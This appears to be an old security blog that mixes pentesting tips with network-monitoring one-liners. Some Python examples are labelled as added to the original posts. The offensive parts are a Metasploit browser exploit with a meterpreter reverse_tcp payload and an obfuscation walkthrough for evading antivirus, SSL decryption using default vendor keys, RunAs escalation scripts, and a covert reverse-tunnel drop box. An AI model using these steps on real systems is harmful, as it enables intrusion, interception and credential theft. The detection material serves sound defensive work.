12.20.2010
Using default private keys to decrypt SSL streams
An old but hugely overlooked issue. Many appliance vendors ship their units with a default private key for SSL communications. Even if you reissue a new certificate, your appliance could still be using the same private key as everyone else's.. and it's typically bundled within the firmware packages publicly distributed by the application vendor. This affects everything from DD-WRT to enterprise class VPN appliances, tape libraries, and firewalls.
Well, someone has finally begun cataloguing these into a searchable database:
http://www.devttys0.com/2010/12/breaking-ssl-on-embedded-devices/
Just look up the device in question, point the lookup tool to a running appliance, or feed it a packet capture or live network interface and it will provide any known private keys.
Once the private key is obtained, you can decrypt the SSL stream with tshark:
tshark -nn -t ad -r [capture_file] -o ssl.keys_list:[server_ip],443,http,"[private_key_file]" -V -R http
Note: For successful decryption, the capture must include the initial full SSL handshake. A full SSL handshake contains ClientHello, ServerHello, Certificate, and ServerHelloDone. If you only see ClientHello, ServerHello, and ChangeCipherSpec, the connection is resuming a previously established SSL session and cannot be decrypted as is.
12.03.2010
Meterpreter scripts for RunAs privilege escalation & other mischief
send_keystrokes.rb: Meterpreter script to interactively send keystrokes to an open application window using the vbscript SendKeys method. Can be used to escalate privileges into RunAs-invoked command shells on XP.
IE_click_run.rb: Meterpreter script to interactively click "Run" at the IE "File Download Security Warning" prompts. Can be used to escalate privileges into RunAs-invoked IE instances without end-user interaction on XP.
JavaScript Obfuscation of Metasploit Browser Exploits for AV bypass
1. Configure the desired browser exploit and payload. Example using ms10_xxx_ie_css_clip:
Module options:
   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     10.20.30.40      yes       The local host to listen on.
   SRVPORT     80               yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used
   URIPATH     /example         no        The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, none, process
   LHOST     10.20.30.40      yes       The listen address
   LPORT     443              yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Automatic
2. "exploit" to start the HTTP server (port 80) and payload handler (port 443).
3. WGET the exploit URI using the --user-agent option to specify the user-agent string of the browser you're targeting. Example for IE7 on XP targets:
wget http://10.20.30.40/example --user-agent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; bgft)"
4. View the HTML source and copy all JavaScript between the "script" tags.
5. Feed to a JavaScript obfuscator of your liking. Examples:
http://www.daftlogic.com/projects-online-javascript-obfuscator.htm
http://javascriptcompressor.com
http://dean.edwards.name/weblog/2007/04/packer3
6. Copy obfuscated JS into a new HTML file.
7. Start a new multi/handler to receive the meterpreter_reverse_tcp shell on port 443 (or whatever your payload requires).
8. Serve your newly obfuscated HTML from BT4 through Apache, or clone a site with SET and edit the embedded iFrame tag to point to your HTML file.
Bam. 0-day with AV bypass? Yeah, you're on the pwnie express. :}
Thanks to Will Metcalf for pointing me in the right direction!
References:
http://rules.emergingthreats.net/research/WMetcalf-CVE-2010-3962/
http://relentless-coding.blogspot.com/2010/07/new-javascript-packer-jsidle.html
http://grey-corner.blogspot.com/2010/01/heap-spray-exploit-tutorial-internet.html
7.09.2010
Introducing.. the Pwn Plug!
A SheevaPlug microserver loaded with pentesting goodness!
:: Preloaded with Ubuntu, Metasploit, Fasttrack, SET, SSLstrip, nmap, dsniff, netcat, nikto, nbtscan, xprobe2, inguma, scapy, ettercap, JTR, medusa, & more
:: Maintains a reverse persistent SSH tunnel to your external pentest box, with support for tunneling over HTTP and ICMP
:: Traverses strict egress firewall filters, webfilters, HTTP proxies, and application-aware firewalls
:: Unpingable & no open ports in stealth mode
:: 4.3 x 2.7 x 1.9 inches, 2.3 watts when idle
:: 1.2GHz ARM cpu with 512M SDRAM, 512M flash HDD
6.13.2010
Decoding OpenLDAP & IBM Directory Server password hashes
OpenLDAP {SHA} hashes are the base64-encoded raw bytes of the SHA hash (not its hex string). Example:
userpassword:: {SHA}W6ph5Mm5Pz8GgiULbPgzG37mj9g=
The original SHA hash can be extracted from this with the help of fdump (http://sourceforge.net/projects/fdump/files/):
echo -n W6ph5Mm5Pz8GgiULbPgzG37mj9g= |base64 -d - |fdump -
IBM Directory Server, while based on OpenLDAP, implements a botched version of this. Instead of base64 encoding the SHA hash only, they encode the "{SHA}" prefix as well. Example:
userpassword:: e1NIQX1bqmHkybk/PwaCJQts+DMbfuaP2A==
The SHA hash can be extracted in the same manner by cutting the hex for "{SHA}" (7b 53 48 41 7d) from the result:
echo -n e1NIQX1bqmHkybk/PwaCJQts+DMbfuaP2A== |base64 -d - |fdump - |cut -c 11-
FTW, let's convert the IBM Directory Server userpassword field back to the OpenLDAP format:
echo -n e1NIQX1bqmHkybk/PwaCJQts+DMbfuaP2A== |base64 -d - |fdump - |cut -c 11- |xxd -r -p |base64 |awk '{print"{SHA}"$1}'
This is called "taking it back". At $30,000 per IBM Directory Server license, I highly recommend it!
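The same decoding and conversion without fdump, as an added example that is not part of the original post. It accepts either userpassword form shown above and checks that what remains is a 20-byte SHA-1 digest; the function names are hypothetical.

```python
import base64

SCHEME = b"{SHA}"  # scheme tag; the digest that follows is 20 raw bytes


def sha_digest_hex(userpassword):
    """Return the hex SHA-1 digest from an OpenLDAP or IBM-style value."""
    value = userpassword.strip()
    if value.upper().startswith("{SHA}"):
        # OpenLDAP form: literal tag, then base64(digest)
        raw = base64.b64decode(value[len(SCHEME):], validate=True)
    else:
        # IBM Directory Server form: base64("{SHA}" + digest)
        raw = base64.b64decode(value, validate=True)
        if not raw.startswith(SCHEME):
            raise ValueError("decoded value does not start with {SHA}")
        raw = raw[len(SCHEME):]
    if len(raw) != 20:
        raise ValueError("expected a 20-byte digest, got %d bytes" % len(raw))
    return raw.hex()


def to_openldap(userpassword):
    """Re-encode either form as an OpenLDAP {SHA} value."""
    digest = bytes.fromhex(sha_digest_hex(userpassword))
    return "{SHA}" + base64.b64encode(digest).decode("ascii")


# The two example values from the post above.
OPENLDAP_VALUE = "{SHA}W6ph5Mm5Pz8GgiULbPgzG37mj9g="
IBM_VALUE = "e1NIQX1bqmHkybk/PwaCJQts+DMbfuaP2A=="

if __name__ == "__main__":
    print(sha_digest_hex(OPENLDAP_VALUE))
    print(sha_digest_hex(IBM_VALUE))
    print(to_openldap(IBM_VALUE))
```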
4.18.2010
Windows Privilege Escalation Talk - BSides Boston
Presented on Saturday, April 24, 4pm @ Security BSides Boston:
# Title: Escalating privileges through Secondary Logon (RunAs) processes
# Abstract: The scenario: You target a sysadmin PC and obtain a backdoor shell through a browser exploit, PDF with embedded payload, or similar client-side vector. However, because the organization is using RunAs best practices, your shell is running with limited user privileges. Some RunAs-invoked programs are running under the sysadmin's Domain Admin account, but you can't directly migrate to these processes from a limited user shell. The RunAs framework indicates that a user-level process should not be allowed to send commands to a greater privilege process. Sounds fairly solid, but as always, there are exceptions..
Slide deck is available here: http://pdfcast.org/download/escalating-privileges-through-runas-processes.pdf
BSides Boston: http://www.securitybsides.com/BSidesBostonTalks
9.09.2009
Forensics: Recovering a 12-year old floppy disk with DD
True story. Earlier this year I was handed a 12-year-old floppy disk loaded with bad sectors and unmountable due to a missing/corrupted partition table. A lost cause? Nope. DD can still image the raw media, skipping unreadable sectors and padding the output file with zeros to keep file structures intact wherever possible.
I booted up a Helix Live CD and ran:
dcfldd if=/dev/fd0 of=floppy.img bs=4k conv=noerror,sync
After much grinding and hissing, DD finished with a fully intact 1.4MB floppy disk image. Almost made me want to scour through my old floppy collection. Almost..
8.22.2009
NSM: Parsing HTTP sessions with tcpflow
:: Show HTTP requests, replies, etc: tcpflow -i [interface] -c -s port 80 | grep HTTP
:: Show all readable HTTP strings: tcpflow -i [interface] -c -s port 80 | grep -v "\.\."
:: Save HTTP flows to local files: tcpflow -i [interface] -s port 80
NSM: PI detection with grep utils
Here's a simple way to monitor network traffic for compliance with state & federal privacy regulations. Monitoring is especially important on perimeter ISP links, where PI can be seen flying naked into the public Internet.. how embarrassing!
These ngrep commands will detect unencrypted SSNs and credit card numbers passing through a network:
:: Spaced SSNs: ngrep -d [interface] -q -t '(\s|^)([0-6]\d\d|7[0-256]\d|73[0-3]|77[0-2]) \d{2} \d{4}(\s|$)'
:: Dashed SSNs: ngrep -d [interface] -q -t '(\s|^)([0-6]\d\d|7[0-256]\d|73[0-3]|77[0-2])-\d{2}-\d{4}(\s|$)'
:: Dashed CCs (16-digit): ngrep -d [interface] -q -t '(\s|^)(6011|5[1-5]\d{2}|4\d{3}|3\d{3})-\d{4}-\d{4}-\d{4}(\s|$)'
:: Non-spaced CCs (16-digit): ngrep -d [interface] -q -t '(\s|^)(6011|5[1-5]\d{2}|4\d{3}|3\d{3})\d{12}(\s|$)'
Storing unencrypted PI on disk is also a big no-no. Here's how to detect these:
:: Spaced/dashed SSNs: pcregrep -r "(\D?\W)([0-6]\d\d|7[0-256]\d|73[0-3]|77[0-2])( |-)\d{2}( |-)\d{4}\D" [folder/drive/network path to search]
:: Spaced/dashed CCs: pcregrep -r "(\D?\W)(6011|5[1-5]\d{2}|4\d{3}|3\d{3})( |-)\d{4}( |-)\d{4}( |-)\d{4}\D" [folder/drive/network path to search]
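The same SSN and card patterns applied to decoded payload text, as an added example that is not from the original post. It goes one step beyond the commands above by dropping 16-digit matches that fail the Luhn checksum and by masking findings so the alert does not re-leak the data; the function names and sample payloads are constructed.

```python
import re

# Patterns adapted from the ngrep/pcregrep commands above. The separator must be
# consistent within an SSN, and a lookahead leaves the trailing whitespace unconsumed.
SSN_RE = re.compile(
    r"(?:\s|^)((?:[0-6]\d\d|7[0-256]\d|73[0-3]|77[0-2])([ -])\d{2}\2\d{4})(?=\s|$)")
CC_RE = re.compile(
    r"(?:\s|^)((?:6011|5[1-5]\d{2}|4\d{3}|3\d{3})(?:(?:-\d{4}){3}|\d{12}))(?=\s|$)")


def luhn_ok(number):
    """True if the digits in `number` pass the Luhn checksum used by card numbers."""
    digits = [int(c) for c in number if c.isdigit()]
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:          # double every second digit from the right
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def mask(number):
    """Keep only the last four digits for the alert record."""
    digits = re.sub(r"\D", "", number)
    return "*" * (len(digits) - 4) + digits[-4:]


def scan(payload):
    """Return (kind, masked_value) findings for one decoded payload string."""
    findings = [("ssn", mask(m.group(1))) for m in SSN_RE.finditer(payload)]
    for m in CC_RE.finditer(payload):
        if luhn_ok(m.group(1)):  # discard look-alike 16-digit strings
            findings.append(("cc", mask(m.group(1))))
    return findings


# Constructed sample payloads (not real data).
SAMPLES = [
    "name=Test User ssn 123-45-6789 dept=IT",
    "card 4111-1111-1111-1111 exp 12/30",
    "order id 4111111111111112 shipped",   # matches the regex, fails Luhn
    "tracking 900-12-3456 delivered",      # area 900 is outside the SSN pattern
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(scan(sample))
```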
NSM: Simple network change detection with nmap
I run this daily to see network adds/changes. MAC address changes are also detected, which is useful for spotting ARP cache poisoning and changes to system hardware.
1. Create a baseline list of network hosts:
nmap -R -sP --system-dns 192.168.1.* -oN temp.txt
grep -v "#" temp.txt | grep -v "appears to be down" > baseline_hosts.txt
rm temp.txt
2. Then, save an updated list of hosts, and compare this against the baseline list:
nmap -R -sP --system-dns 192.168.1.* -oN temp.txt
grep -v "#" temp.txt | grep -v "appears to be down" > current_hosts.txt
rm temp.txt
grep -v -x -F -f baseline_hosts.txt current_hosts.txt
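The final grep compares line by line, so a changed MAC address prints as a bare "MAC Address" line without the host it belongs to. The added example below (not from the original post) pairs each host with its MAC before diffing; it assumes the older nmap normal-output layout ("Host ... appears to be up." followed by a "MAC Address:" line), and the sample scans and function names are constructed.

```python
import ipaddress
import re

# Assumed layout: older nmap "-sP -oN" output, host line followed by its MAC line.
HOST_RE = re.compile(r"^Host (?:\S+ \()?(\d+\.\d+\.\d+\.\d+)\)? appears to be up")
MAC_RE = re.compile(r"^MAC Address: ([0-9A-Fa-f:]{17})")


def parse_hosts(text):
    """Map each live IP to its MAC address (None if nmap reported no MAC)."""
    hosts, ip = {}, None
    for line in text.splitlines():
        host = HOST_RE.match(line)
        mac = MAC_RE.match(line)
        if host:
            ip = host.group(1)
            hosts[ip] = None
        elif mac and ip:
            hosts[ip] = mac.group(1).upper()
    return hosts


def diff_hosts(baseline, current):
    """Return change records, keeping each MAC change attached to its IP."""
    changes = []
    for ip in sorted(set(baseline) | set(current), key=ipaddress.ip_address):
        if ip not in baseline:
            changes.append(("new", ip, current[ip]))
        elif ip not in current:
            changes.append(("gone", ip, baseline[ip]))
        elif baseline[ip] != current[ip]:
            changes.append(("mac-changed", ip, f"{baseline[ip]} -> {current[ip]}"))
    return changes


# Constructed sample scans (not real hosts).
BASELINE = """\
Host gw.example (192.168.1.1) appears to be up.
MAC Address: 00:11:22:33:44:55 (Constructed Vendor)
Host 192.168.1.20 appears to be up.
MAC Address: 00:11:22:33:44:66 (Constructed Vendor)
Host 192.168.1.30 appears to be up.
MAC Address: 00:11:22:33:44:77 (Constructed Vendor)
"""
CURRENT = """\
Host gw.example (192.168.1.1) appears to be up.
MAC Address: 00:AA:BB:CC:DD:EE (Constructed Vendor)
Host 192.168.1.20 appears to be up.
MAC Address: 00:11:22:33:44:66 (Constructed Vendor)
Host 192.168.1.40 appears to be up.
"""

if __name__ == "__main__":
    for change in diff_hosts(parse_hosts(BASELINE), parse_hosts(CURRENT)):
        print(*change)
```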
NSM: Web/email traffic analysis with Bro-IDS
:: Top 10 email senders: grep "FROM: " [Bro_mime.log] | egrep -o "\w+@[a-zA-Z_]+?\.[a-zA-Z]{2,6}" | sort | uniq -c | sort -nr | head -n 10
:: Top 10 email recipients: grep "TO: " [Bro_mime.log] | egrep -o "\w+@[a-zA-Z_]+?\.[a-zA-Z]{2,6}" | sort | uniq -c | sort -nr | head -n 10
:: Top 10 web browser/client apps: cat [Bro_http.log] | grep -i user-agent | cut -f6- -d' ' | sort | uniq -c | sort -nr | head -n 10
:: Top 10 web servers (based on HTTP objects): cat [Bro_http.log] | grep "HOST: " | awk '{ print$5 }' | sort | uniq -c | sort -nr | head -n 10
:: Top 10 DNS A-record queries: cat [Bro_dns.log] | grep "query ?A" | awk '{ print$6 }' | sort | uniq -c | sort -nr | head -n 10
:: Top 10 HTTP server response codes: cat [Bro_http.log] | pcregrep -o '\(\d{3} "' | cut -c 2-5 | sort | uniq -c | sort -nr | head -n 10
:: HTTP POST/GET counts: cat [Bro_http.log] | pcregrep -o "POST|GET" | sort | uniq -c | sort -nr
NSM: Top 10s with Argus!
:: Top 10 web servers: ra -nn -r [argus_file] -s daddr - tcp and dst port 80 | awk '{print$1}' | sort | uniq -c | sort -nr | head -n 10
:: Top 10 FTP servers: ra -nn -r [argus_file] -s daddr - tcp and dst port 21 | awk '{print$1}' | sort | uniq -c | sort -nr | head -n 10
:: Top 10 SMTP servers: ra -nn -r [argus_file] -s daddr - tcp and dst port 25 | awk '{print$1}' | sort | uniq -c | sort -nr | head -n 10
:: Top 10 SMTP clients: ra -nn -r [argus_file] -s saddr - tcp and dst port 25 | awk '{print$1}' | sort | uniq -c | sort -nr | head -n 10
:: Top 10 protocols: ra -n -r [argus_file] -s proto | awk '{print$1}' | sort | uniq -c | sort -nr | head -n 10
:: Top 10 TCP ports: ra -nn -r [argus_file] -s dport - tcp | awk '{print$1}' | sort | uniq -c | sort -nr | head -n 10
:: Top 10 UDP ports: ra -nn -r [argus_file] -s dport - udp | awk '{print$1}' | sort | uniq -c | sort -nr | head -n 10
:: Top 10 source (client) IPs: ra -nn -r [argus_file] -s saddr - not arp | awk '{print$1}' | sort | uniq -c | sort -nr | head -n 10
:: Top 10 destination (server) IPs: ra -nn -r [argus_file] -s daddr - not arp | awk '{print$1}' | sort | uniq -c | sort -nr | head -n 10
:: Top 10 host-pairs: ra -nn -r [argus_file] -s proto saddr dir daddr | grep -v man | awk '{print$2$3$4}' | sort | uniq -c | sort -nr | head -n 10
NSM: SSL handshake analysis with ssldump
:: Total SSL Handshakes: ssldump -n -r [capture_file] | grep Handshake | wc -l
:: Total ClientHellos: ssldump -n -r [capture_file] | grep ClientHello | wc -l
:: List SSL versions negotiated: ssldump -n -r [capture_file] | grep Version | sort | uniq -c | sort -nr
:: List CipherSuites negotiated: ssldump -n -r [capture_file] | grep "cipherSuite" | sort | uniq -c | sort -nr
:: List ServerHello events: ssldump -n -r [capture_file] | grep "ServerHello" | sort | uniq -c | sort -nr
:: Total ChangeCipherSpec events: ssldump -n -r [capture_file] | grep ChangeCipherSpec | wc -l
7.29.2008
Hardware Hacking: Ghetto wifi bridge